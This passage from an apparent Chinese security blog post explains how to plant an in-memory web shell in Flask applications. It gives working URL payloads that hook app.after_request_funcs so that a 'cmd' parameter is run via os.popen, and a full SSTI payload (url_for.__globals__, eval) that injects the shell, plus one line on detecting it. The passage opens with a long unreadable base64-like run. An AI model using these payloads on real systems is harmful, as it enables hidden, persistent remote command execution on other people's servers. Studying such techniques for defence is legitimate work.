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
|
|||
|
|
<code>self.after_request_funcs.setdefault(None, []).append(f)</code>传入的f就是对应的自定义函数,但这里的f需要接收一个response对象,同时返回一个response对象。</p>
|
|||
|
|
<p>但我们仅通过lambda无法对原始传进来的response进行修改后再返回,所以需要重新生成一个response对象,然后再返回这个response。</p>
|
|||
|
|
<p>访问对应的url为<code>http://127.0.0.1:5000/e?cmd=app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec('global CmdResp;CmdResp=make_response(os.popen(request.args.get(\'cmd\')).read())')==None else resp)</code></p>
|
|||
|
|
<p>函数的内容为:</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=k>lambda</span> <span class=n>resp</span><span class=p>:</span> <span class=c1>#传入参数</span>
|
|||
|
|
<span class=n>CmdResp</span> <span class=k>if</span> <span class=n>request</span><span class=o>.</span><span class=n>args</span><span class=o>.</span><span class=n>get</span><span class=p>(</span><span class=s1>'cmd'</span><span class=p>)</span> <span class=ow>and</span> <span class=c1>#如果请求参数含有cmd则返回命令执行结果</span>
|
|||
|
|
<span class=k>exec</span><span class=p>(</span><span class=s1>'</span>
|
|||
|
|
<span class=k>global</span> <span class=n>CmdResp</span><span class=p>;</span> <span class=c1>#定义一个全局变量,方便获取</span>
|
|||
|
|
<span class=n>CmdResp</span><span class=o>=</span><span class=n>make_response</span><span class=p>(</span><span class=n>os</span><span class=o>.</span><span class=n>popen</span><span class=p>(</span><span class=n>request</span><span class=o>.</span><span class=n>args</span><span class=o>.</span><span class=n>get</span><span class=p>(</span>\<span class=s1>'cmd</span><span class=se>\'</span><span class=s1>)).read()) #创建一个响应对象</span>
|
|||
|
|
<span class=s1>')==None #恒真</span>
|
|||
|
|
<span class=k>else</span> <span class=n>resp</span><span class=p>)</span> <span class=c1>#如果请求参数没有cmd则正常返回</span>
|
|||
|
|
<span class=c1>#这里的cmd参数名和CmdResp变量名都是可以改的,最好改成服务中不存在的变量名以免影响正常业务</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<h2 id=toc-3>ssti利用</h2>
|
|||
|
|
<p>如果存在ssti,例如</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=nd>@app.route</span><span class=p>(</span><span class=s1>'/'</span><span class=p>)</span>
|
|||
|
|
<span class=k>def</span> <span class=nf>home</span><span class=p>():</span>
|
|||
|
|
<span class=n>person</span> <span class=o>=</span> <span class=s1>'guest'</span>
|
|||
|
|
<span class=k>if</span> <span class=n>request</span><span class=o>.</span><span class=n>args</span><span class=o>.</span><span class=n>get</span><span class=p>(</span><span class=s1>'name'</span><span class=p>):</span>
|
|||
|
|
<span class=n>person</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=n>args</span><span class=o>.</span><span class=n>get</span><span class=p>(</span><span class=s1>'name'</span><span class=p>)</span>
|
|||
|
|
<span class=n>template</span> <span class=o>=</span> <span class=s1>'<h2>Helo </span><span class=si>%s</span><span class=s1>!</h2>'</span> <span class=o>%</span> <span class=n>person</span>
|
|||
|
|
<span class=k>return</span> <span class=n>render_template_string</span><span class=p>(</span><span class=n>template</span><span class=p>)</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>考虑到没有导包的情况,完整的url为:</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=n>http</span><span class=p>:</span><span class=o>//</span><span class=mf>127.0</span><span class=o>.</span><span class=mf>0.1</span><span class=p>:</span><span class=mi>5000</span><span class=o>/</span><span class=err>?</span><span class=n>name</span><span class=o>=</span><span class=p>{{</span><span class=n>url_for</span><span class=o>.</span><span class=vm>__globals__</span><span class=p>[</span><span class=s1>'__builtins__'</span><span class=p>][</span><span class=s1>'eval'</span><span class=p>](</span><span class=s2>"app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec(</span><span class=se>\"</span><span class=s2>global CmdResp;CmdResp=__import__(</span><span class=se>\'</span><span class=s2>flask</span><span class=se>\'</span><span class=s2>).make_response(__import__(</span><span class=se>\'</span><span class=s2>os</span><span class=se>\'</span><span class=s2>).popen(request.args.get(</span><span class=se>\'</span><span class=s2>cmd</span><span class=se>\'</span><span class=s2>)).read())</span><span class=se>\"</span><span class=s2>)==None else resp)"</span><span class=p>,{</span><span class=s1>'request'</span><span class=p>:</span><span class=n>url_for</span><span class=o>.</span><span class=vm>__globals__</span><span class=p>[</span><span class=s1>'request'</span><span class=p>],</span><span class=s1>'app'</span><span class=p>:</span><span class=n>url_for</span><span class=o>.</span><span class=vm>__globals__</span><span class=p>[</span><span class=s1>'current_app'</span><span class=p>]})}}</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>此时会发现成功打上了一个内存马。从防御角度看,这种注入只是向内存中的列表追加了一个回调,排查时可以检查 <code>app.after_request_funcs</code> 中是否出现了代码里并未注册的 lambda 回调。</p>
|
|||
|
|
<p><a id=img4 href=https://xzfile.aliyuncs.com/media/upload/picture/20240506192303-01285bc0-0b9b-1.png><img src="data:image/png;base64,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
|
|||
|
|
<p>参考:</p>
|
|||
|
|
<p><a href=https://xz.aliyun.com/t/10933 target=_blank>Python 内存马分析</a></p>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|